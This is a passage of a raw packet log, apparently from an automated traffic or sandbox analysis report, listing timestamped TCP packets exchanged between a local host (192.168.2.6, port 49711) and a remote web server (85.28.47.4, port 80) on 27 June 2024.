                                                                Jun 27, 2024 05:58:09.993446112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993463039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993489027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993501902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993535042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993666887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993678093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993689060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993701935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993712902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993714094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993722916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993729115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993735075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993757010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993781090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993927002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993938923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993949890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993962049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993966103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993973970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993985891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993985891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994010925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994028091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994210005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994221926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994231939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994242907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994254112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994255066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994265079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994277000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994280100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994290113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994298935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994316101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994338989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994540930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994551897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994563103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994575977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994586945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994611025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994697094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994709015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994719028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994731903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994748116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994770050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994893074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994904041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994915962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994926929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994937897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994940042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994951010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.994957924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.994978905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071197033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071214914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071228027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071290016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071300983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071312904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071325064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071333885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071479082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071506023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071547985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071610928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071623087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071633101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071643114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071655035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071664095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071666956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.071681976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.071700096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.076833963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.076867104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.076879978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.076914072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.076955080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.076970100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.076982975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.076993942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077006102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077012062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077033043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077054024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077111959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077148914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077224970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077236891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077248096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077260971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077270985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077271938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077282906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077286005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077294111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077308893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077315092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077339888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077356100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077636003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077646971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077657938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077670097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077681065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077682018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077692986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077698946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077725887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077727079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077740908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077752113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077761889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077763081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077773094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077785015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077785969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077795029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077814102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.077815056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077832937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.077858925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.078319073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078330040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078341961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078352928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078365088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078368902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.078377008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078392029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.078413963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.078583002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078594923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078605890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078617096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078628063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.078629017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.078659058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.080144882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.080214024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.120942116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.126538992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301701069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301717043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301729918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301784039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301795959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301806927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301811934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.301819086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.301846981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.301866055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302062035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302073956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302086115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302098036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302103996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302109957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302120924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302120924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302131891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302144051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302151918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302155972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302170038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302196026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302354097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302390099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302575111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302587986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302598953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302609921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302611113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302622080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302630901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302633047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302644968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302656889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302658081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302668095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302674055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302680016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302691936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302697897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302702904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302705050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302715063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302726030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302733898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302736998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302748919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302762032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.302762032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302977085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.302977085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303414106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303425074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303435087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303447008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303457975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303461075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303469896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303486109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303488016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303498030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303508043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303508997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303522110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303529024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303533077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303544998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303551912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303555965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303567886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303579092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303580046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303596020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303606033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303606987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303618908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303622961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303632021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.303654909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.303677082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304344893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304354906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304373980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304385900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304392099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304397106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304409027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304409981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304419994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304430962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304430962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304444075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304455042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304456949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304466009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304476976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304477930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304495096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304498911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304507017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304517984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304518938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304531097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304542065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304542065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304553986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304564953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304569006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304577112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.304585934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.304610968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305282116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305294037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305305004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305316925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305326939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305326939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305339098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305340052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305351019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305362940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305363894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305375099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305386066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305392027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305397987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305407047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305412054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305423021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305424929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305433989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305443048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305445910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305457115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305468082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305469990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305481911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305491924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305494070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305507898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.305511951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305529118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.305555105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306174994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306188107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306199074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306209087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306214094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306221008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306226969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306232929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306243896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306255102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306257010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306267977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306272030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306278944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306289911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306293011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306302071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306313038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306314945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306324959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306335926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306343079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306345940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306358099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306365967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306370020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.306385994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.306406975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389101982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389117956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389130116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389142036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389153004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389172077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389183998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389195919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389206886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389218092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389221907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389229059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389242887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389283895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389507055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389525890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389538050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389545918 CEST4971180192.168.2.685.28.47.4
